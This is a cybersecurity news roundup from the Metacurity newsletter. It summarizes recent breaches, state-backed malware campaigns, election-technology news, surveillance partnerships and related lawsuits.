The Com members doxxed DHS and ICE workers

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

A group of hackers from the Com, a loose-knit community behind some of the most significant data breaches in recent years, has posted the names and personal information of hundreds of government officials, including people working for the Department of Homeland Security (DHS) and Immigration and Customs Enforcement (ICE).

“I want my MONEY MEXICO,” a user of the Scattered LAPSUS$ Hunters Telegram channel, which is a combination of a series of other hacking group names associated with the Com. The message was referencing a claim from the DHS that Mexican cartels have begun offering thousands of dollars for doxing agents. The US government has not provided any evidence for this claim.

Out of multiple spreadsheets posted on the group's Telegram channel, one contained the alleged personal information of 680 DHS officials; another contained data on more than 170 FBI email addresses and their owners; and the third contained the apparent personal information of more than 190 Department of Justice officials. 

Using data collected by cybersecurity company District 4 Labs, 404 Media corroborated some of the data posted to Telegram. It showed that many parts of the dox did relate to government officials with the same name, agency, address, or phone number. In some cases, the addresses posted by the hackers appear to relate to residential addresses rather than offices.

It is not clear how the hackers collated or otherwise sourced this data, be that by combining previous diffuse data breaches or by obtaining it from a government-specific breach.

DHS has repeatedly said that its officers are facing a wave of doxing and physical threats in the second Trump administration. Most recently, the agency said officials “are facing a more than 1000% increase in assaults against them and their families are being doxxed and threatened online.” It is not clear how exactly DHS is quantifying those events to calculate that increase. (Joseph Cox / 404 Media)

Related:  r/uspolitics, r/behindthebastards, r/goodnews

Cisco Talos and Google Threat Intelligence Group researchers report that North Korean operatives who dupe job seekers into installing malicious code on their devices have been spotted using new malware strains and techniques, resulting in the theft of credentials or cryptocurrency and ransomware deployment.

Cisco Talos said it observed an attack linked to Famous Chollima that involved the use of BeaverTail and OtterCookie, separate but complementary malware strains frequently used by the North Korea-aligned threat group. Researchers said their analysis determined the extent to which BeaverTail and OtterCookie have merged and displayed new functionality in recent campaigns.

GTIG said it observed UNC5342 using EtherHiding, malicious code in the form of JavaScript payloads that turn a public blockchain into a decentralized command and control server. Researchers said UNC5342 incorporated EtherHiding into a North Korea-aligned social engineering campaign previously dubbed Contagious Interview by Palo Alto Networks.

Cisco and Google both said North Korean threat groups’ use of more specialized and evasive malware underscores the efforts the nation-state attackers are taking to achieve multiple goals while avoiding more common forms of detection.

By installing EtherHiding on the blockchain, UNC5342 can remotely update the malware’s functionality and maintain continuous control over its operations without worrying about infrastructure takedowns or disruptions. (Matt Kapko / CyberScoop)

Related: Google Cloud, Cisco Talos, Coincentral, BeInCrypto, Ars Technica

Former GOP operative Scott Leiendecker just bought Dominion Voting Systems, giving him ownership of voting systems used in 27 states.

He is rebranding Dominion, which has headquarters in Canada and the United States, under the name Liberty Vote “in a bold and historic move to transform and improve election integrity in America” and to distance the company from false allegations made previously by President Donald Trump and his supporters that the company had rigged the 2020 presidential election to give the win to President Joe Biden.

The rebranded company will be 100 percent American-owned, will have a “paper ballot focus” that leverages hand-marked paper ballots, will “prioritize facilitating third-party auditing,” and is “committed to domestic staffing and software development.”

The rebranded company will also ostensibly be 100 percent American-owned, will have a “paper ballot focus” that leverages hand-marked paper ballots, will “prioritize facilitating third-party auditing,” and is “committed to domestic staffing and software development.” 

Philip Stark, professor of statistics at UC Berkeley and a longtime election-integrity advocate, says Liberty’s assurance about domestic-only workers is a red herring. “If the claim is that this is somehow a security measure, it isn’t. Because programmers based in the US also … may be interested in undermining or altering election integrity,” he says.

With regard to third-party audits mentioned in the press release, a Liberty official said this means the company will conduct a “third-party, top-to-bottom, independent review of [Dominion] software and equipment in a timely manner and will work closely with federal and state certification agencies and report any vulnerabilities” to give voters assurance in the machines and the results they produce.

The company didn’t say when this review would occur, but a Liberty representative told Axios it would happen ahead of next year's midterm elections, and the company would "rebuild or retire" machines as needed. (Kim Zetter / Wired)

Related: Colorado Public Radio, Colorado Newsline

Federal prosecutors have charged voting technology firm Smartmatic with money laundering and other crimes arising from more than $1 million in bribes that several executives allegedly paid to election officials in the Philippines.

The payments, between 2015 and 2018, were made to obtain a contract with the Philippines government to help run that country’s 2016 presidential election and secure the timely payment for its work, according to a superseding indictment filed in a Florida federal court.

Three former executives of Smartmatic, including co-founder Roger Pinate, were previously charged in 2024, but at the time, South Florida-based Smartmatic was not named as a defendant. Pinate, who no longer works for Smartmatic but remains a shareholder, has pleaded not guilty.

The criminal case is unfolding as Smartmatic is pursuing a $2.7 billion lawsuit accusing Fox News of defamation for airing false claims that the company helped rig the 2020 US presidential election, in which Joe Biden defeated Donald Trump. (Joshua Goodman / Associated Press)

Related: Justice Department, Zero Day, Reuters, The New York Times, The Wall Street Journal, Deadline, Raw Story, Mediaite, Washington Examiner

The head of MI5, the UK’s domestic security service, revealed that its spies had disrupted a new threat from China in recent days, as he expressed frustration over the collapse of an espionage case linked to Beijing.

“We’ve intervened operationally again just in the last week,” MI5 Director-General Ken McCallum told reporters, declining to elaborate on the nature of the activity. “Do Chinese state actors present a UK national security threat? The answer is: Of course, yes, they do — every day.”

Chinese spying in Britain has come under greater scrutiny in the wake of prosecutors’ decision to drop a case against two men accused of trying to gather intelligence about the country’s policy toward Beijing. The Crown Prosecution Service has said it abandoned the case because the government had not met the threshold of designating China as a national security threat.

The suspects have denied the allegations.

Prime Minister Keir Starmer has redirected blame toward the prosecutors and the Conservative government that was in power when the charges were first brought. On Wednesday, he released witness statements by Deputy National Security Adviser Matthew Collins showing that he described the activity in the case as representing an “active espionage threat.” (Alex Wickham / Bloomberg)

Related: BBC News, Reuters, Sky News, The Independent, The Guardian

Hackers stole the personal information of over 17.6 million people after breaching the systems of peer-to-peer lending marketplace Prosper.

As the company disclosed one month ago on a dedicated page, the breach was detected on September 2, but Prosper has yet to find evidence that the attackers gained access to customer accounts and funds.

However, the attackers stole data belonging to Prosper customers and loan applicants. The company hasn't shared what information was exposed beyond Social Security numbers because it's still investigating what data was affected.

Prosper added that the security breach didn't impact its customer-facing operations and that it has reported the incident to relevant authorities and is collaborating with law enforcement to investigate the attack.

While Prosper didn't share how many customers were affected by this data breach, data breach notification service Have I Been Pwned revealed the extent of the incident, reporting that it affected 17.6 million unique email addresses.

The stolen information also includes customers' names, government-issued IDs, employment status, credit status, income levels, dates of birth, physical addresses, IP addresses, and browser user agent details. (Sergiu Gatlan / Bleeping Computer)

Related: Malwarebytes, Infosecurity Magazine, Security Week

For Sweden, an increasingly cashless society where 90% of transactions are digital, the banking sector represents a particular vulnerability in light of the growing adoption of hybrid cyber-physical attacks by Russia.

The central bank has mapped the payment system’s pressure points and has mainly built its plans around two headline scenarios: large-scale cyberattacks and prolonged outages in electricity and data communications.

Cyberattacks don’t have to be the sort of sophisticated breaches or ransomware attacks that have hit companies around the world to create major disruptions.

In April, BankID, a digital authentication service used by millions of Swedes and a significant part of the country’s digital payments system, was subject to a distributed denial of service, or DDoS attack, where assailants try to overwhelm a system with requests, forcing it offline or slowing it down until it’s unusable.

The result was hours of disruption that left Swedes unable to send money through Swish — the mobile payment app used for everything from splitting lunch bills to paying rent — or access online banking and other services tied to BankID. (Evelina Youcefi / Bloomberg)

Related: r/europe

A ransomware attack on MuniOS, a website operated by Ann Arbor, Michigan-based tech company ImageMaster LLC, is disrupting state and local borrowers’ ability to post debt documents on the $4.3 trillion municipal-bond market’s main distribution platform.

MuniOS has been out of service for several days due to the cyber attack, according to people familiar with the matter.

Borrowers use the website to showcase their bond offering documents, and it’s a popular service used by investors and analysts for information about transactions before they are sold. While market participants said they hadn’t seen or experienced any delays in deals, some issuers are shifting long-held practices by turning to alternative platforms such as BondLink due to the disruption.

The MuniOS outage is causing issuers, investors, bankers, and lawyers headaches and inconvenience, but so far, transactions have proceeded normally, according to multiple market participants who spoke on the condition of anonymity. The disruption has prompted some to directly send large-file PDFs between parties the old-fashioned way, while others have seen their days fill up with long phone calls from investors unable to access documents, they say. (Erin Hudson and Amanda Albright / Bloomberg)

Related: Bloomberg Law, The Bond Buyer

The Korean government officially acknowledged that hackers had accessed the Onnara system, a government work management platform, and administrative digital signature certificates called the government public key infrastructure (GPKI), which are essential for civil servant authentication.

Authorities said they are investigating how the breach occurred and assessing the extent of the damage, while also implementing new security measures.

During a press briefing at the government complex in Sejong, the Ministry of the Interior and Safety confirmed that “in mid-July, the National Intelligence Service (NIS) discovered signs that an external party accessed the Onnara system via the Government Virtual Private Network (G-VPN).”

The statement came two months after a report by Phrack Magazine, a US-based cybersecurity publication, claimed that the Ministry of the Interior and Safety, Ministry of Foreign Affairs, Ministry of Unification, Ministry of Oceans and Fisheries, telecom companies KT and LG U+, and private tech firms including Daum, Kakao and Naver, had all been targeted by hackers.
 
Until now, the Korean government had remained silent, but on Friday, it acknowledged that the report’s claims were accurate. (MOON HEE-CHUL / KoreaJoongAngDaily)

Related: Yonhap News Agency, Chosun Biz, MHN

The number of victims affected by unauthorized connections to illegal base stations not managed by Korean telco giant KT, which led to personal data leaks and unauthorized micro-payments, has turned out to be far greater than initially reported, the telecom company said.

At a press briefing held at its Gwanghwamun headquarters in Jongno District, central Seoul, KT said the number of illegal base station IDs connected to its network has increased from four to 20, and that an additional 2,200 users were found to have connected to them, bringing the total number of affected customers to around 22,200.

The illegal base station connections began on Oct. 8, 2024, and continued for 305 days. The affected areas, initially limited to Seoul and Gyeonggi, have expanded to include Gangwon. KT added that it is still verifying the timeline between when the breach began and when it was first detected.

“There is a possibility that additional illegal base stations exist beyond those already seized,” said Koo Jae-hyung, head of KT’s network technology division. “If further devices are identified through the investigation, we will disclose the findings.”

KT conducted a full-scale review of 150 million payment transactions processed through its network between Aug. 1 and Sept. 10, 2024. Initially, the company only examined transactions authenticated through automated response systems (ARS), but following public criticism, it expanded the review to include SMS and PASS authentication as well. The broader review uncovered 63 additional cases of unauthorized micro-payments made through SMS verification. (JEONG JAE-HONG / KoreaJoongAngDaily)

Related: MHN, Yonhap News Agency

Iran-backed hackers sought to blackmail former US national security advisor John Bolton over emails they had accessed, according to an indictment accusing him of mishandling classified material.

Bolton fell out with President Donald Trump since serving in his first term and has become a strident critic of the populist president.

The indictment, which draws upon investigations that gained pace under the presidency of Joe Biden, accuses Bolton of sending over a thousand pages of so-called diary notes about his duties in 2018 and 2019.

Bolton, prosecutors allege, used his AOL email account and an insecure messaging app to transmit some materials to two unnamed people who lacked security clearances. Those messages, the indictment added, included “national defense information,” including top secret classified material.

On or around July 6, 2021, the indictment alleged, a Bolton representative contacted the FBI, saying, "evidently someone has gotten into Amb. Bolton's personal email account and that it looks as though it is someone in Iran."

The hacker allegedly taunted Bolton according to an email forward to the FBI by the representative, saying, “This could be the biggest scandal since Hillary’s emails were leaked, but this time on the G.O.P side! Contact me before it’s too late," in a reference to the Republican party.

On or around August 5, 2021, the indictment continued, Bolton received another email from the hackers saying, "OK John ... As you want (apparently), we'll disseminate the expurgated sections of your book by reference to your leaked email".

Bolton, prosecutors said, did not inform the FBI that the contents of the hacked emails could have been classified. (Iran International)

Related: Times of Israel, Associated Press

Researchers at Resecurity report that ransomware gang Qilin's success appears to be its "close affiliation" with a network of bulletproof hosting providers with ties to companies in Saint Petersburg, Russia, and Hong Kong that help the group "to discreetly host illicit content and infrastructure beyond the reach of law enforcement.

Qilin's data leak blog has advertised services offered by Bearhost Servers, also known as Underground and Voodoo Servers, and mentioned various services, including Hong Kong-based Cat Technologies, which uses a domain previously tied to malicious activity and connected to St. Petersburg-based Aeza Group.

The US Treasury Department on July 1 described Aeza as a bulletproof hosting service that has provided services to the Meduza and Lumma infostealers, hosting to ransomware groups BianLian and RedLine, and supported darknet drug markets. Researchers have tied it to the pro-Kremlin influence operation tracked as Doppelgänger. 

Bearhost last December began advertising a mass scanning service, as well as new infrastructure onto which they'd move all customers. "Typically, cybercriminals purchase such servers to scan for vulnerable hosts and applications and exploit them at scale," Resecurity said.

Right before the end of the year, Bearhost claimed to have announced that their service was no longer working. But Resecurity said this was a ruse, meant to mask the operators taking their service into "private mode," through which they would sell services to people they already trusted or who passed extensive vetting checks. (Matthew J. Schwartz / Infosecurity Magazine)

Related: Resecurity, Security Affairs, SC Media

Researchers at Trend Micro report that threat actors exploited a recently patched remote code execution vulnerability (CVE-2025-20352) in Cisco networking devices to deploy a rootkit and target unprotected Linux systems.

The security issue leveraged in the attacks affects the Simple Network Management Protocol (SNMP) in Cisco IOS and IOS XE and leads to RCE if the attacker has root privileges.

The attacks exploited the flaw in Cisco 9400, 9300, and legacy 3750G series devices and deployed rootkits on "older Linux systems that do not have endpoint detection response solutions."

In the original bulletin for CVE-2025-20352, updated on October 6, Cisco tagged the vulnerability as exploited as a zero day, with the company's Product Security Incident Response Team (PSIRT) saying it was "aware of successful exploitation."

Trend Micro researchers track the attacks under the name 'Operation Zero Disco' because the malware sets a universal access password that contains the word "disco."

The report from Trend Micro notes that the threat actor also attempted to exploit CVE-2017-3881, a seven-year-old vulnerability in the Cluster Management Protocol code in IOS and IOS XE.

Related: Trend Micro, Security Affairs

Major international auction house Sotheby’s is notifying individuals of a data breach incident on its systems where threat actors stole sensitive information, including financial details.

The hack was detected on July 24 and the investigtion took two months to determine they type of data stolen and the individuals impacted as a result.

According to a filing the organization submitted to Maine’s AG office, the data exposed in the incident includes full names, Social Security numbers (SSNs), and financial account information.

At the time of writing, no ransomware groups have assumed responsibility for the attack at Sotheby’s. (Bill Toulas / Bleeping Computer)

Related: Maine Attorney General, Security Affairs, The Register

Amazon’s surveillance camera maker Ring announced a partnership with Flock, a maker of AI-powered surveillance cameras that share footage with law enforcement.

Now, agencies that use Flock can request that Ring doorbell users share footage to help with “evidence collection and investigative work.”

Flock cameras work by scanning the license plates and other identifying information about cars they see. Flock’s government and police customers can also make natural language searches of their video footage to find people who match specific descriptions. However, AI-powered technology used by law enforcement has been proven to exacerbate racial biases.

On the same day that Ring announced this partnership, 404 Media reported that ICE, the Secret Service, and the Navy had access to Flock’s network of cameras. By partnering with Ring, Flock could potentially access footage from millions more cameras. (Amanda Silberling / TechCrunch and Joseph Cox / 404 Media)

Related: CNBC, Washington Post

Digital rights group the Electronic Frontier Foundation (EFF) filed a lawsuit against the Trump administration over the government’s alleged social media monitoring of people who are lawfully living in the United States.

The suit contends that the government is using AI and other methods to watch the social media posts of virtually every single non-citizen who is in the United States legally and on a valid visa, as well as many people who have obtained permanent resident status. The US government is, according to these allegations, looking for posts that express views that the current government disfavors.

The lawsuit states that the list of forbidden posts includes those that criticize American culture and the US government; those that express antisemitic/pro-Palestine support, including support of university protests on the matter; those that rationalize or make light of Charlie Kirk’s murder; or those that criticize the Trump administration or its actions.

The EFF also alleges that the government is threatening non-citizens with punishments, which include revoking their visas or immigration confinement.

The lawsuit points to posts on the State Department’s X account. This includes the currently pinned thread documenting the visas that the department revoked over comments about Charlie Kirk. (Julie Bort / TechCrunch)

Related: EFF, NBC News

The Dairy Farmers of America said cybercriminals breached company systems in June, gaining access to the information of employees and members of the cooperative.

The organization previously confirmed to the outlet Dairy Herd Management in June that multiple manufacturing plants within its network were dealing with a ransomware attack. A notorious ransomware gang took credit for the incident days after the statement was released.

The organization filed breach notifications with regulators in Maine, explaining that the personal information of 4,546 people was exposed during the attack. The information stolen includes names, Social Security numbers, driver's license or state-issued ID numbers, dates of birth, bank account numbers, and Medicare or Medicaid numbers. (Jonathan Greig / The Record)

Related: Maine Attorney General

In a departure from the trend of AI chatbots and machine learning being baked into the web browser, Tor Browser 15.0a4, which is the latest alpha release, is available now, and one of the biggest changes is that it removes various AI features that Mozilla has been integrating into Firefox.

The Tor team is taking a firm stance, stating that these machine learning systems are inherently un-auditable from a security and privacy standpoint. Essentially, they don't want to include anything that could compromise your privacy or imply an endorsement of these systems. (Jorge A. Aguilar / HowToGeek)

Related: Tor Blog, Hacker News (ycombinator)

Best Thing of the Day: She Should Take Them for Everything They've Got

A New Jersey teenage girl whose real photo was allegedly transformed by a classmate into at least one fake-nude image is suing AI/Robotics Venture Strategy 3 Ltd, the developer of the “clothes removal” software that was used.

Worst Thing of the Day: Does Musk Do Anything Good for Humanity?

An AFP investigation shows scam centers in Myanmar, blamed for swindling billions from victims across the globe, are expanding just months after a crackdown that was supposed to eradicate them, thanks in part to their wide-scale access to Elon Musk's Starlink internet service.

Closing Thought